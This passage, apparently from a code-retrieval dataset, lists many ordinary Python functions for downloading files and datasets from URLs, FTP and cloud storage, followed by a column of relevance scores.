os.path.isdir(Download.DATA_ROOT): # 若 data 目录不存在,创建 data 目录\n os.mkdir(Download.DATA_ROOT)\n file_path = os.path.join(Download.DATA_ROOT, Download.FILE_NAME)\n\n if os.path.exists(file_path): # 若已存在该文件\n statinfo = os.stat(file_path)\n if statinfo.st_size == Download.FILE_SIZE: # 若该文件正确,直接返回 file_path\n print('Found and verified %s' % file_path)\n return file_path\n else: # 否则,删除文件重新下载\n os.remove(file_path)\n\n download_url = Download.URL + Download.FILE_NAME\n print('Downloading %s ...' % download_url)\n filename, _ = urlretrieve(download_url, file_path) # 下载数据\n print('Finish downloading')\n\n statinfo = os.stat(filename)\n if statinfo.st_size == Download.FILE_SIZE: # 校验数据是否正确下载\n print('Found and verified %s' % filename)\n else:\n print(statinfo.st_size)\n raise Exception('Failed to verify ' + filename + '. Can you get to it with a browser ?')\n return filename", "def fetch_and_cache(data_url, file, data_dir=\"data\", force=False):\n data_dir = Path(data_dir)\n data_dir.mkdir(exist_ok = True)\n file_path = data_dir / Path(file)\n if force and file_path.exists():\n file_path.unlink()\n if force or not file_path.exists():\n print('Downloading...', end=' ')\n resp = requests.get(data_url)\n with file_path.open('wb') as f:\n f.write(resp.content)\n print('Done!')\n last_modified_time = time.ctime(file_path.stat().st_mtime)\n else:\n last_modified_time = time.ctime(file_path.stat().st_mtime)\n print(\"Using cached version that was downloaded (UTC):\", last_modified_time)\n return file_path", "def get_data_from_storage(data_file):\n print(f\"{CR}Yipes, I don't know how to pull data from dvc yet{C0}\")", "def download_data(self):\n headers = {'User-Agent': 'Mozilla/5.0',}\n\n #Request for html data of url page\n r = requests.get(self.url, headers = headers, allow_redirects=True)\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n #Checking if folder path exists, if not, creats it\n i=0\n while i<len(self.folder)-1:\n if self.folder[i] == '/':\n if not os.path.isdir(self.folder[:i]):\n os.mkdir(self.folder[:i])\n i+=1\n if i==len(self.folder)-1:\n if not os.path.isdir(self.folder):\n os.mkdir(self.folder)\n\n # if not os.path.isdir(self.folder):\n # os.mkdir(self.folder)\n\n #Gets every href to zip file with data\n entries = []\n for link in soup.find_all('a'):\n if re.search(\"^data/.*.zip\", link.get('href')):\n entries.append(link.get('href'))\n\n #Gets the newest dataset\n self.getCurrentData(entries)\n\n i=0\n #Saves each file in dataset\n for list in self.ListOfZipFiles:\n if not os.path.isfile(self.folder+list[4:]):\n r = requests.get(self.url+list)\n open(self.folder+list[4:], 'wb').write(r.content)\n #deletes prefix \"data/\"\n self.ListOfZipFiles[i] = list[4:]\n i+=1", "def download_file(service, drive_file):\r\n download_url = drive_file.get('downloadUrl')\r\n if download_url:\r\n resp, content = service._http.request(download_url)\r\n if resp.status == 200:\r\n #print 'Status: %s' % resp\r\n return content\r\n else:\r\n #print 'An error occurred: %s' % resp\r\n return None\r\n else:\r\n # The file doesn't have any content stored on Drive.\r\n return None", "def fetch_sprot_dat(location):\n # login or reconnect\n ftp = ftplib.FTP('ftp.uniprot.org')\n ftp.login() \n \n # move into documents location\n ftp.cwd('/pub/databases/uniprot/current_release/knowledgebase/complete/')\n\n # get file contents\n print('...starting download of UniProt Sprot dat file')\n fname = 'uniprot_sprot.dat.gz'\n ftp.retrbinary('RETR {}'.format(fname), open(os.path.join(location, fname), 'wb').write)\n print('...{} was downloaded OK'.format(fname))\n\n # logout connection and return\n ftp.quit()\n return", "def get_data(self, url):\n\n req = urllib2.Request(url)\n # urlencode the query dictionary\n try:\n r = urllib2.urlopen(req)\n result = r.read()\n except:\n result = 'The url: %s is not responding.' % (url)\n return result", "def _get_file(cls, url: str, ende: str) -> bool:\n resposta = requests.get(url)\n if resposta.status_code == requests.codes.OK:\n with open(ende, 'wb') as novo_arquivo:\n novo_arquivo.write(resposta.content)\n return True\n else:\n resposta.raise_for_status()\n return False", "def download_data(self, url: str, source_type: str) -> None:\n r = None # request\n\n # download data from nextcloud\n if source_type == \"nextcloud\":\n token = url\n r = requests.get(\n os.environ[\"NC_WEBDAV_URL\"], auth=(token, os.environ[\"NC_PASSWORD\"])\n )\n\n # download data from generic URLs\n if source_type == \"generic_url\":\n s = requests.Session()\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\"\n }\n s.headers.update(headers)\n r = s.get(url)\n\n f_name = None # file name\n\n if \"content-disposition\" in r.headers.keys():\n d = r.headers[\"content-disposition\"]\n f_name = re.findall('filename=\"(.+)\"', d)[0]\n else:\n f_name = url.split(\"/\")[-1]\n\n # save file\n try:\n with open(Path(os.environ[\"DATA_PATH\"]) / f_name, \"wb\") as f:\n for chunk in r.iter_content(self.chunk_size):\n f.write(chunk)\n except OSError:\n print(f\"Error: {list(Path(os.environ['DATA_PATH']).iterdir())}\")", "def get_file(self, path):\n file = self.get('data_request?id=file&parameters=%s' % path)\n return file", "def download_file(service, drive_file):\n download_url = drive_file.get('downloadUrl')\n if download_url:\n resp, content = service._http.request(download_url)\n if resp.status == 200:\n #print 'Status: %s' % resp\n return content\n else:\n print 'An error occurred: %s' % resp\n return None\n else:\n # The file doesn't have any content stored on Drive.\n return None", "def get_data_from_URL(url):\n querystring = {\"q\": \"eminem\"}\n headers = {\n 'x-rapidapi-host': \"deezerdevs-deezer.p.rapidapi.com\",\n 'x-rapidapi-key': \"SIGN-UP-FOR-KEY\"\n }\n\n response = requests.request(\n \"GET\", url, headers=headers, params=querystring)\n received_file = json.loads(response.text)\n return received_file", "def _download(self) -> None:\n download_url(\n self.url,\n self.root,\n filename=self.data_dir,\n md5=self.md5 if self.checksum else None,\n )\n self._extract()", "def fetch(self, url: furl) -> str:\n try:\n contents = self._download(url)\n except requests.ConnectionError as err:\n logger.exception(f\"Request failed with {err}\")\n click.secho(\n f\"The URL {url} could not be downloaded. Either your network is unreachable or the URL is broken.\"\n f\" Check the URL, fix your connection, or use \"\n f\" {OptionEnum.OFFLINE.as_flake8_flag()} / {OptionEnum.OFFLINE.as_envvar()}=1\",\n fg=\"red\",\n err=True,\n )\n return \"\"\n return contents", "def testGetDrugBankUrl(self):\n try:\n remoteLocator = \"https://www.drugbank.ca/releases/latest/downloads/all-full-database\"\n un = \"username\"\n pw = \"password\"\n # fn = self.__fileU.getFileName(remoteLocator)\n ok = self.__fileU.isLocal(remoteLocator)\n self.assertFalse(ok)\n #\n lPath = os.path.join(self.__workPath, \"db-download.zip\")\n ok = self.__fileU.get(remoteLocator, lPath, username=un, password=pw)\n self.assertTrue(ok)\n ok = self.__fileU.exists(lPath)\n self.assertTrue(ok)\n ok = self.__fileU.isLocal(lPath)\n self.assertTrue(ok)\n tPath = self.__fileU.getFilePath(lPath)\n self.assertEqual(lPath, tPath)\n self.__fileU.uncompress(lPath, outputDir=self.__workPath)\n\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def retrieve_ipac_file(url):\n \n request = urllib2.Request(url)\n \n # Encode the username and password to send for authorization\n base64string = base64.encodestring('%s:%s' % (IPAC_USER, IPAC_PASSWORD)).replace('\\n', '')\n request.add_header(\"Authorization\", \"Basic %s\" % base64string)\n \n # Retrieve the response\n try:\n response = urllib2.urlopen(request)\n except urllib2.HTTPError, e:\n print \"HTTPError: Authorization failed or request invalid.\\n\\t->HTTP Response returned error code {}\".format(e.code)\n raise\n except urllib2.URLError, e:\n print \"URLError: {}\".format(e.reason)\n raise\n \n file = StringIO.StringIO(response.read())\n return file", "def wind3dp_single_download(file, path=None):\n\n # add a OS-specific '/' to end end of 'path'\n if path:\n if not path[-1] == os.sep:\n path = f'{path}{os.sep}'\n else:\n path = sunpy.config.get('downloads', 'download_dir') + os.sep\n\n data = file.split('_')[1] # e.g. 'sfsp'\n year = file.split('_')[3][:4]\n base = f\"https://sprg.ssl.berkeley.edu/wind3dp/data/wi/3dp/{data}/{year}/\"\n\n url = base+'/'+file\n\n try:\n downloaded_file = pooch.retrieve(url=url, known_hash=None, fname=file, path=path, progressbar=True)\n except ModuleNotFoundError:\n downloaded_file = pooch.retrieve(url=url, known_hash=None, fname=file, path=path, progressbar=False)\n except requests.HTTPError:\n print(f'No corresponding data found at {url}')\n downloaded_file = []\n\n return downloaded_file", "def _downloadDataFile(self):\n config = SiteConfiguration.objects.get()\n\n with requests.Session() as s:\n # Authentication\n data = {\n 'identificationBean.identifiant': '{}'.format(config.login),\n 'identificationBean.mdp': '{}'.format(config.password),\n 'userName': '{}'.format(config.username)\n }\n url = 'http://extranet.ffbb.com/fbi/identification.do'\n s.post(url, data=data)\n\n # Create filters\n params = (\n ('action', 'executeCsv'),\n ('rechercherRencontreSaisieResultatBean.idDivision', ''),\n ('rechercherRencontreSaisieResultatBean.rechercherEquipe2', 'O'),\n ('rechercherRencontreSaisieResultatBean.dateDebutRencontre', ''),\n ('rechercherRencontreSaisieResultatBean.dateFinRencontre', ''),\n ('rechercherRencontreSaisieResultatBean.idPoule', ''),\n ('rechercherRencontreSaisieResultatBean.numeroEquipe', ''),\n )\n\n # Get Csv file\n url = 'http://extranet.ffbb.com/fbi/rechercherCompetitionRencontre.do'\n response = s.get(url, params=params)\n\n if(response.headers['content-type'] != 'application/ms-excel;charset=UTF-8'):\n return False\n\n # Create the file\n if response.status_code == 200:\n os.makedirs(os.path.dirname(settings.DATA_PATH), exist_ok=True)\n with open(settings.DATA_PATH, 'wb') as f:\n for chunk in response:\n f.write(chunk)\n\n return True", "def get_file_data(filename):", "def download_data(url, filename, dst_dir):\r\n fullpath = os.path.join(dst_dir, filename)\r\n if os.path.exists(fullpath):\r\n return\r\n\r\n # Try to open url\r\n try:\r\n page = urlopen(url)\r\n except Exception:\r\n shutil.copy(PLACEHOLDER, fullpath)\r\n return\r\n\r\n f = open(fullpath, 'wb')\r\n while True:\r\n buff = page.read(BLOCK_SZ)\r\n if not buff:\r\n break\r\n f.write(buff)\r\n f.close()\r\n pass", "def get_data(self, url, username, password, timeout):\n\n request = urllib2.Request(url)\n request.add_header('User-Agent',\n 'check_jenkins/%s %s' % (__version__, __url__))\n if (username and password):\n base64string = base64.b64encode('%s:%s' % (username, password))\n request.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\n try:\n setdefaulttimeout(timeout)\n return urllib2.urlopen(request).read()\n except HTTPError:\n print 'CRITICAL: Error on %s does the job exist or ever ran ?' % url\n raise SystemExit, 2\n except URLError:\n print 'CRITICAL: Error on %s Double check the server name' % url\n raise SystemExit, 2", "def fetch(self, url) -> bytes:\n buffer = self.download(url)\n zfs = ZipFileSystem(buffer, \"r\")\n return zfs.open(zfs.glob(\"*\")[0]).read()", "def get_remote_content(self, path):\n if path.startswith(\"http\"):\n page_path = path\n elif path.startswith(\"www\"):\n page_path = \"https://\" + path\n else:\n page_path = self.source + path\n \n print(\"Getting \" + page_path)\n \n try:\n resp = requests.get(page_path)\n except:\n print(\"Unable to get \" + page_path)\n return None\n \n if resp.status_code == 200:\n return resp.content\n else:\n print(\"Unable to get \" + page_path + \" Response = \" + str(resp.status_code))\n return None", "def extract_data(url,file_path):\n #setup session\n with session() as c:\n #post request\n c.post('https://www.kaggle.com/account/login',data=payload)\n #open file to write\n with open(file_path,'wb') as handle:\n #get request\n response=c.get(url,stream=True)\n print(response)\n for block in response.iter_content(1024):\n handle.write(block)", "def fetch_zenodo(self):\n\n # retrieve content from URL\n try:\n logging.info(f\"Downloading example data from {self.url}\")\n r = requests.get(self.url, stream=True)\n with io.BytesIO() as stream:\n with tqdm.wrapattr(\n stream,\n 'write',\n file=sys.stdout,\n miniters=1,\n desc=self.url,\n total=int(r.headers.get('content-length', 0))\n ) as file:\n for chunk in r.iter_content(chunk_size=4096):\n file.write(chunk)\n with zipfile.ZipFile(stream) as zipped:\n # extract each file in the zipped dir to the project\n for f in zipped.namelist():\n logging.info(\"Unzipped: {}\".format(os.path.join(self.destination, f)))\n zipped.extract(f, self.destination)\n\n logging.info(\"Download and install complete.\")\n\n self.close_logger()\n\n except requests.exceptions.MissingSchema:\n msg = f\"Unable to download data from {self.url}\"\n logging.exception(msg)\n self.close_logger()\n raise", "def download(self, url, filename):\n print(\"url\", url)\n print(\"filename\", filename)\n # open in binary mode\n with open(filename, \"wb\") as file:\n # get request\n try:\n r = requests.get(url)\n if r.status_code == 404:\n raise NotFoundException(\n \"URL: \", url, \" is not working. Status code 404\")\n # write to file\n file.write(r.content)\n print(\"file downloaded\")\n except ConnectionError as ex:\n print(ex)\n except NotFoundException as ex:\n print(ex)\n except Exception as ex:\n print(ex)", "def ferry_data_download(URL):\n explanation = 'File exists'\n file_downloaded = True\n # Request if the thredds server is working, add .html to URL\n req = requests.get(URL + '.html')\n if req.status_code == 200:\n \"\"\"File exists and is good for download, so write file\"\"\"\n print('File is ok')\n explanation = 'Good URL, File downloaded'\n file_downloaded = True\n ferry = xr.open_dataset(URL)\n else:\n print('File not found or unavailable')\n explanation = ' File not found or unavailable'\n file_downloaded = False\n ferry = np.nan\n return (ferry, file_downloaded, explanation)", "def download():\n raise NotImplementedError", "def fetch(data_dir):\n file_path = os.path.join(data_dir, DESTINATION, ZIP_NAME)\n result_path = os.path.join(data_dir, DESTINATION, NAME)\n return utils.fetch(URL, file_path, result_path)", "def get_url_data(url):\n\n # Return data while saving the data in a file \n # which is a hash of the URL\n data = requests.get(url).content\n # Save it in a filename\n filename = hashlib.md5(url.encode(\"utf8\")).hexdigest()\n# open(filename, 'w').write(data)\n with open(filename, \"w\") as fileObj:\n fileObj.write(data.decode(\"utf8\"))\n return data", "def get_from_net(self, url):\n print 'opening', url\n ty = urlopen(url)\n print 'reading...'\n s = ty.read()\n print 'done'\n return s", "def fetch_the_data():\n subprocess.run([\"wget\", \"https://storage.googleapis.com/recipe-box/recipes_raw.zip\"])\n subprocess.run([\"unzip\", \"recipes_raw.zip\", \"-d\", RECIPES_DIRPATH])\n subprocess.run([\"rm\", \"recipes_raw.zip\"])", "def get_backup_data():\n print '\\nConnection Error, Using Backup JSON File\\n'\n if system() == \"Darwin\":\n backup_file = 'Backup/backup.json'\n else:\n backup_file = '/home/pi/MurmurWall/Raspi/Backup/backup.json' \n with open(backup_file) as backup_json_file: \n current_json = load(backup_json_file)\n return current_json", "def main(url, localfile):\n ph.download_file(url, localfile)", "def _fs_get_file(url, working_dir):\n if not os.path.isabs(url) and working_dir:\n url = os.path.join(working_dir, url)\n\n try:\n with codecs.open(url, 'r', encoding='utf-8') as f:\n return f.read()\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def send_get_request(url, file_name=None):\r\n request = urllib.request.Request(url, headers={'User-Agent': AGENT})\r\n with urllib.request.urlopen(request) as response:\r\n response_context = response.read()\r\n if file_name is None:\r\n return response_context\r\n with open(file_name, 'bw+') as f:\r\n f.write(response_context)\r\n return response_context", "def fetch_velib_auto():\n # This try statement guards against the lack of internet connection\n try:\n dat = get_velib_data()\n except URL.URLError as err:\n print \"URLError: No internet connection?\"\n return 0\n\n save_velib_data(dat, glob.datafile)", "def retrieve(url_and_path):\n try:\n urlretrieve(url_and_path[0], url_and_path[1])\n except HTTPError:\n pass", "def get_url_data(self, url):\n # print \"opening: \" + url\n request = urllib2.Request(url)\n base64string = '%s:%s' % (self.username, self.key)\n request.add_header(\"Authorization\", \"ApiKey %s\" % base64string)\n response = urllib2.urlopen(request)\n data = json.loads(response.read())\n return data", "def download():\r\n reader = GSODDataReader()\r\n year_list = range(2001, 2012)\r\n austin = reader.collect_data(year_list, exact_station=True,\r\n station_name='AUSTIN CAMP MABRY', state='TX', country='US')\r\n houston = reader.collect_data(year_list, exact_station=True,\r\n station_name='HOUSTON/D.W. HOOKS', state='TX', country='US')\r\n new_york = reader.collect_data(year_list, exact_station=True,\r\n station_name='NEW YORK/LA GUARDIA', state='NY', country='US')\r\n newark = reader.collect_data(year_list, exact_station=True,\r\n station_name='NEWARK INTL AIRPORT', state='NJ', country='US')\r\n punta_arenas = reader.collect_data(year_list, exact_station=True,\r\n station_name='PUNTA ARENAS', country='CH')\r\n wellington = reader.collect_data(year_list, exact_station=True,\r\n station_name='WELLINGTON AIRPORT', country='NZ')\r\n store = HDFStore('weather.h5')\r\n store['austin'] = austin\r\n store['houston'] = houston\r\n store['nyc'] = new_york\r\n store['newark'] = newark\r\n store['punta_arenas'] = punta_arenas\r\n store['wellington'] = wellington\r\n store.close()", "def read_data_nmt():\n data_dir = download_extract('fra-eng')\n with open(os.path.join(data_dir, 'fra.txt'), 'r') as f:\n return f.read()", "def _download_data_from_nfs_connection(self) -> 'DataFrame':\n\n # note: as we need to load a data into the memory,\n # we are using pure requests and helpers from the WML client\n data_path = self.location.path\n connection_id = self.connection.asset_id\n\n return self._download_data_from_nfs_connection_using_id_and_path(connection_id, data_path)", "def downloadData(url):\r\n\r\n data = urllib2.urlopen(url)\r\n csvdata = data.read()", "def data_file(self, path):\n return open(os.path.join(self.resource_path, path)).read()", "def get_fred_data(url):\n pass", "def get_data(datapath, asfile=False):\n import os\n\n ## The file is a local file - try to get it\n if not os.path.isfile(datapath) :\n print \"The file %s you are trying to access does not exist\" %(datapath)\n raise IOError\n fn = datapath\n if asfile:\n return open(fn)\n else:\n import numpy as np\n return np.loadtxt(fn)", "def get(self, filename, **kw):\n\n file_path = os.path.join(self.storage_path, filename)\n try:\n file_obj = open(file_path, \"r\")\n except IOError:\n return\n else:\n return file_obj.read()", "def __getFile_httplib(self, _src, _dst):\n\n #-------------------- \n # Pre-download callbacks\n #-------------------- \n self.runEventCallbacks('downloadStarted', _src, -1)\n self.runEventCallbacks('downloading', _src, 0)\n\n\n\n #-------------------- \n # Download\n #-------------------- \n response = self.__httpsRequest('GET', _src)\n data = response.read() \n with open(_dst, 'wb') as f:\n f.write(data) \n\n\n\n #-------------------- \n # Post-download callbacks\n #-------------------- \n self.removeFromDownloadQueue(_src)\n self.runEventCallbacks('downloadFinished', _src)", "def get_remote_bytes(file_url) -> io.BytesIO:\n result = urlfetch.fetch(file_url)\n return io.BytesIO(result.content)", "def __download_file(self, filename):\r\n \r\n respons = requests.get(self.__url + filename, stream=True)\r\n save_filename = os.path.join(self.__folder, os.path.basename(filename))\r\n with open(save_filename, 'wb') as output_file:\r\n for chunk in respons.iter_content(chunk_size=128):\r\n output_file.write(chunk)", "def download_dataset(self):\n raise NotImplementedError", "def download_data():\n url = 'https://www.dropbox.com/s/h9ubx22ftdkyvd5/ml-latest-small.zip?dl=1'\n urllib.request.urlretrieve(url, 'ml-latest-small.zip')\n zfile = zipfile.ZipFile('ml-latest-small.zip')\n zfile.extractall()\n zfile.close()", "def download(self, url):\n try:\n webFile = urllib.urlopen(url)\n localFile = open(self.workdir + \"/\" + url.split('/')[-1], 'w')\n localFile.write(webFile.read())\n webFile.close()\n localFile.close()\n except IOError:\n print(\"could not get url \" + url)", "def fetch_and_cache(data_url, file, data_dir=\"data\", force=False):\n\n import requests\n from hashlib import md5\n from pathlib import Path\n\n data_dir = Path(data_dir)\n data_dir.mkdir(exist_ok=True)\n file_path = data_dir/Path(file)\n # If the file already exists and we want to force a download then\n # delete the file first so that the creation date is correct.\n if force and file_path.exists():\n file_path.unlink()\n if force or not file_path.exists():\n resp = requests.get(data_url, stream=True)\n file_size = int(resp.headers.get('content-length', 0))\n step = 40\n chunk_size = file_size//step\n with file_path.open('wb') as f:\n for chunk in resp.iter_content(chunk_size): # write file in chunks\n f.write(chunk)\n step -= 1\n print('[' + '#'*(41 - step) + (step)*' ' + ']\\r', end='')\n print(f\"\\nDownloaded {data_url.split('/')[-1]}!\")\n else:\n import time\n time_downloaded = time.ctime(file_path.stat().st_ctime)\n print(\"Using version already downloaded:\", time_downloaded)\n # Compute and print md5 hash of file, whether newly downloaded or not\n m5 = md5()\n m5.update(file_path.read_bytes())\n print(f\"MD5 hash of file: {m5.hexdigest()}\")\n return file_path", "def data_url(self):\n raise NotImplementedError", "def data_url(self):\n raise NotImplementedError", "def download(self, url):\n if url is None:\n return\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\n headers = {'User-Agent': user_agent}\n r = requests.get(url, headers=headers, verify=False)\n if r.status_code == 200:\n r.encoding = 'utf-8'\n return r.text\n return None", "def run_downloader(self):\n \"\"\"calls to the file downloader\"\"\"\n try:\n html = self.get_page(self.url)\n soup = self.get_soup(html)\n if soup is not None: # If we have soup -\n self.get_links(soup)\n self.get_files()\n else:\n self.producer(\"THESS_ENV_CITYOFTHESS_DAILY_YEARLY_DATA_ERROR\", 'data source format is not as expected',\n e)\n return False\n except Exception as e:\n self.producer(\"THESS_ENV_CITYOFTHESS_DAILY_YEARLY_DATA_ERROR\", 'data source format is not as expected', e)\n\n return False\n return True", "def provider_download_data(self, uid: str, data_file: str) -> int:\n return self.context.download(\"/ckks/provider/data/%s\" % uid, data_file, None, None,\n \"CKKS:: failed downloading provider data for uid: %s\" % uid\n )", "def request_data(url): \n requests_cache.install_cache('data_cache')\n while True:\n data = requests.get(url)\n if not data.status_code == 200 or \"try again later\" in data.text:\n continue\n else:\n break\n return data.text", "def download(self):\n file_url = posixpath.join(self.mirrors, self.resources)\n _urlretrieve(file_url, os.path.join(self.root, self.resources))", "def download(self):\n file_url = posixpath.join(self.mirrors, self.resources)\n _urlretrieve(file_url, os.path.join(self.root, self.resources))", "def fetch_repo_file(self, path, save = False, mode = 'w'):\n\t\ttry:\n\t\t\tprint(\"Fetching repo file: {0}\".format(self.config[\"repo\"][\"repo_proto\"] + \"://\" + self.config[\"repo\"][\"repo_addr\"] + \":\" + self.config[\"repo\"][\"repo_port\"] + path))\n\t\t\n\t\t\tdata = urllib.request.urlopen(self.config[\"repo\"][\"repo_proto\"] + \"://\" + self.config[\"repo\"][\"repo_addr\"] + \":\" + self.config[\"repo\"][\"repo_port\"] + path).read()\n\n\t\t\tif save != False:\n\t\t\t\tf = open(path, mode)\n\t\t\t\tf.write(data)\n\t\t\t\tf.close()\n\t\t\treturn data\n\t\texcept Exception as e:\n\t\t\tprint(\"Failed to connect to server, exiting...\");\n\t\t\tsys.exit(1)" ]
[ "0.6372641", "0.625264", "0.62305814", "0.62305814", "0.6188294", "0.6158766", "0.6149518", "0.6095374", "0.60664946", "0.60570997", "0.6010867", "0.60009617", "0.59899217", "0.59876364", "0.59813595", "0.59589547", "0.5951379", "0.5951082", "0.59479934", "0.5938637", "0.59257716", "0.5866726", "0.5848593", "0.5824035", "0.58207947", "0.58157593", "0.58142287", "0.58027077", "0.57977873", "0.57806283", "0.5764325", "0.57585496", "0.57584006", "0.5754634", "0.5750337", "0.5747216", "0.5743346", "0.570748", "0.56958514", "0.56868315", "0.568437", "0.56736606", "0.5671862", "0.56718457", "0.567076", "0.56635", "0.565652", "0.56499916", "0.564338", "0.56415576", "0.5634477", "0.5634246", "0.5633767", "0.56268513", "0.56188357", "0.56177765", "0.5592624", "0.55763775", "0.5575407", "0.55753857", "0.55526197", "0.5548782", "0.55364764", "0.5533237", "0.55327004", "0.5524826", "0.55246055", "0.5523757", "0.5519993", "0.5509843", "0.5509735", "0.5508114", "0.5505641", "0.5502354", "0.549553", "0.5490462", "0.5479843", "0.54771334", "0.54767966", "0.547353", "0.5466902", "0.546655", "0.54639035", "0.5463482", "0.546346", "0.5458396", "0.54481435", "0.5445144", "0.54381377", "0.5435728", "0.54316205", "0.5429262", "0.5429262", "0.5426132", "0.5424916", "0.5423493", "0.54228204", "0.5422154", "0.5422154", "0.54169744" ]
0.60267264
10
This method takes in a results file created by ibex, strips out the comments, concatenates lines together that should go together, and outputs complete lines to the specified text file
def parse_results_file(filename): file = open(filename, 'r') pretext=[line for line in file.readlines() if line.strip()] file.close() text = [] processed = [] languages = 'NONE' ID = 'NONE' moreheader = raw_input('Extra header labels from question field (e.g.: item,condition,factor1,factor2): ') stim_type = raw_input('What type are your stims? (i.e. AcceptabilityJudgment): ') output_loc = raw_input('Where would you like to put your parsed file? (enter filename path): ') #takes out comments for line in pretext: if re.match('#', line): continue else: text.append(line) first = 1; for line in range(len(text)): #get their info if re.search('Form', text[line]): if re.search('number', text[line]): ID = re.split('number,', text[line])[1].strip() elif re.search('age', text[line]): languages = re.split('age,', text[line])[1].strip() #looks for the main stimulus type, as entered earlier if re.search(stim_type, text[line]): if first: #print 'first' processed.append(str(ID+ ','+languages+','+text[line])) first=0 else: toAmend = processed.pop() #print str('toAmend: ' + toAmend) toAdd='' splits = re.split('NULL,', text[line]) for thing in splits[1:]: if thing is not '': toAdd = str(toAdd + ',' + thing.strip(',')) #print str('toAdd: ' + toAdd) processed.append(str(toAmend.strip()+ toAdd)) first = 1 #if the line is a question line, there's more to append if re.search('Question', text[line]): toAmend = processed.pop() part = re.split('\$', text[line])[1] part.strip('$') parts = part.split('%2C') processed.append(str(toAmend.strip()+ ','+ string.join(parts, ',')+'\n')) output = open(output_loc, 'w') header = 'ID,Languages,Time sent,MD5 Hash of IP Address,Controller,Item Number,Element Number,Type,Group,Stimulus,Answer,RT,' output.write(str(header+moreheader+'\n')) #put it all into a text file for line in processed: output.write(line) output.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main(inputfname, outfname):\n with open(inputfname, 'rt', encoding='utf8') as fh:\n # first block\n reviews = []\n while True:\n comment = next(fh).strip()\n if not comment:\n # blank line, block separator\n break\n url_moviedb = next(fh).strip()\n url_moviedb, movie_id = fix_moviedb(url_moviedb)\n reviews.append((comment, url_moviedb, movie_id))\n\n # second block\n futures = []\n while True:\n try:\n title = next(fh).strip()\n except StopIteration:\n break\n if not title:\n continue\n url_moviedb = next(fh).strip()\n url_moviedb, movie_id = fix_moviedb(url_moviedb)\n futures.append((title, url_moviedb, movie_id))\n\n lines, viewed = process_reviews(reviews)\n lines.append(\"\")\n lines.extend(process_futures(futures))\n lines.append(\"\")\n\n pelis_lines, raw_pending = proc_pelshtml(futures, viewed)\n\n lines.extend(line.format(enter='', space=' ') for line in raw_pending)\n lines.append(\"\")\n lines.extend(pelis_lines)\n lines.extend(line.format(enter='<br/>', space='&nbsp;') for line in raw_pending)\n\n with open(outfname, 'wt', encoding='utf8') as fh:\n fh.write(\"\\n\".join(lines))", "def process_all(self):\n global multi_comment_line_mode\n multi_comment_line_mode = False\n for line in self.fileToProcess:\n line = line.strip() # creating a strip line, with no whitespace in the beginning and in the end\n # multi_comment_line_mode = False\n # first, we want to filter all the lines which are comments or part of comments\n while line != '':\n ignoring_status,newline = self.shouldTheLineBeIgnored(line)\n if ignoring_status:\n break # we are ignoring the line\n elif (not ignoring_status) and (newline != '') and newline != '$endOfMultiLine':\n line = newline\n continue\n elif not ignoring_status and newline == '$endOfMultiLine':\n break\n else:\n line = self.isThereApartToIgnore(line) #getting the good line\n line = line.strip()\n if line.endswith('$endOfMultiLine'):\n # line = line[:-1]\n line = line[:-15]\n # in this case we don't want to ignore the current line\n # if multi_comment_line_mode:\n # # this comes from the\n list_of_line_strings = re.split('(\\W)', line) # the default of this method is to remove all the white spaces\n list_of_line_strings = list(filter(None, list_of_line_strings))\n global i\n i = 0\n global first_index\n first_index = 0\n global second_index\n second_index = 0\n len_of_list = len(list_of_line_strings)\n while i < len_of_list:\n # first adding the string literals\n if (list_of_line_strings[i] == '\"' and i == 0) or (i>0 and list_of_line_strings[i] == '\"' and\n list_of_line_strings[i-1]!='*'):\n first_index = i\n i = i + 1\n if i == len(list_of_line_strings):\n break\n while list_of_line_strings[i] != '\"':\n i = i + 1\n if i>=len(list_of_line_strings):\n # in case it's the end\n i = first_index\n break\n else:\n continue\n second_index = i\n list_of_line_strings[first_index:second_index + 1] = [\n ''.join(list_of_line_strings[first_index:second_index + 1])]\n i = i + 2\n len_of_list = len(list_of_line_strings)\n else:\n i = i + 1\n j=0\n global skip_mode\n skip_mode = False\n global counter\n counter = 0\n for string in list_of_line_strings:\n if j != len(list_of_line_strings)-1:\n j+=1\n if counter == 1:\n counter = 0\n continue\n if skip_mode and not (string == '*' and list_of_line_strings[j] == '/'):\n continue\n if skip_mode and string == '*' and list_of_line_strings[j] == '/':\n skip_mode = False\n counter = 1\n continue\n if string == \"/\" and (list_of_line_strings[j] == \"/\" ):\n # this is a comment that appeared in the line\n break # in this case, there are no more chars to read because it's a note\n if string == \"/\" and list_of_line_strings[j] == \"*\":\n skip_mode = True\n counter = 1\n continue # entering a skip mode\n if string.strip() == '':\n continue\n self.currStringToProcess = string\n type = self.tokenType()\n self.createToken(type,self.currStringToProcess)\n break", "def remove_empty_lines(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # Closing the intermediate file.\n self.result_code = open(\"result.c\",\"w\") #Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line is empty.\n if line != \"\\n\":\n self.result_code.write(line) # Writing the non-empty line onto the intermediate file.\n self.result_code.close() # Closing the intermediate file.", "def make_result_file(seek_file):\n with open('numbers.txt', 'r') as f, open('result.txt', 'w') as result_file:\n f.seek(seek_file)\n result_file.write(f.readline().replace(' ', '\\n'))\n os.remove('numbers.txt')", "def output(results):\n\n text_file = open(\"problem_1_B_output.txt\", \"w\")\n\n out = \"\"\n\n for i, line in enumerate(results):\n\n string = \"Sample {}: {}, posterior probability of {:.4f}\".format(i + 1,\n line[0],\n line[1])\n\n out += (string + \"\\n\")\n\n text_file.write(out)\n\n text_file.close()", "def write_result(fragment_list, results, output_file):\n if not output_file:\n output_file = results + os.sep + \"prodigal_filtered.txt\"\n try:\n with open(output_file, \"wt\") as output:\n for fragment in fragment_list:\n output.write(\"{1}{0}{2}{0}\".format(\n os.linesep, fragment[0], fill(fragment[1])))\n except IOError:\n 